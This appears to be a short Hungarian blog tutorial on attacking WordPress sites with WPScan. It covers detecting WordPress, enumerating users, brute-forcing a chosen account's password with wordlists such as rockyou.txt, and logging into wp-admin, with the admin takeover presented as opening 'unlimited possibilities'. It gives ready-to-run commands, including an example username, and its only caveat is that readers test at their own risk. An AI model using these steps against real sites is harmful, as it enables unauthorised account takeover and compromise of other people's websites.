Bőven találunk sebezhetőséget rajta ha megfelelő módon keressük én most bemutatnék egyet a sok közül.
Hogyan működik?
Először is feltárja,hogy az oldalon valóban wordpress fut e? Aztán neki lát és megnézi a plugineket,témákat,sablonokat stb. Nagy esélyünk van rá,hogy az admin passwordot is megszerezzük, ezután meg korlátlan lehetőségünk van:)
Mire lesz szükségem?
A program Backtrack/Kali Linuxon alapból van Windows-hoz viszont le kell tölteni.
A script: Letöltés
Windows (Ruby): Letöltés
Parancsok magyar nyelven: Letölés
Kezdjük!
Sima oldal scan: ruby ./wpscan.rb --url www.valami.com
A pluginek,témák,sablonok nekem most annyira nem fontosak de a parancs megtalálható a txt fájlban a letöltések között ha valaki kiváncsi rá. A felhasználókat a következő paranccsal tudjuk megjeleníteni.
wpscan --url www.valami.hu --enumerate uHa meg van a felhasználók listája kiválasztunk egyet és rá próbálunk szótár fájlal.
wpscan --url www.valami.hu --wordlist /a wordlist file helye/rockyou.txt --username felhasználó amit választottál.
Nézzünk egy példát mert miért is ne?!
wpscan --url www.valami.hu --wordlist /usr/share/magyarwordlist.txt --username lillian65
Ha meg van a jelszó: ---> http://valami.hu/wp-admin
Kitöltjük a mezőket, a többi rajtatok áll.
Mindenkinek a figyelmébe ajánlanám jobb oldalon a FIGYELEM panelt:) nem véletlen készült, mindenki csak saját felelősségére tesztelje a programot.
Nincsenek megjegyzések:
Megjegyzés küldése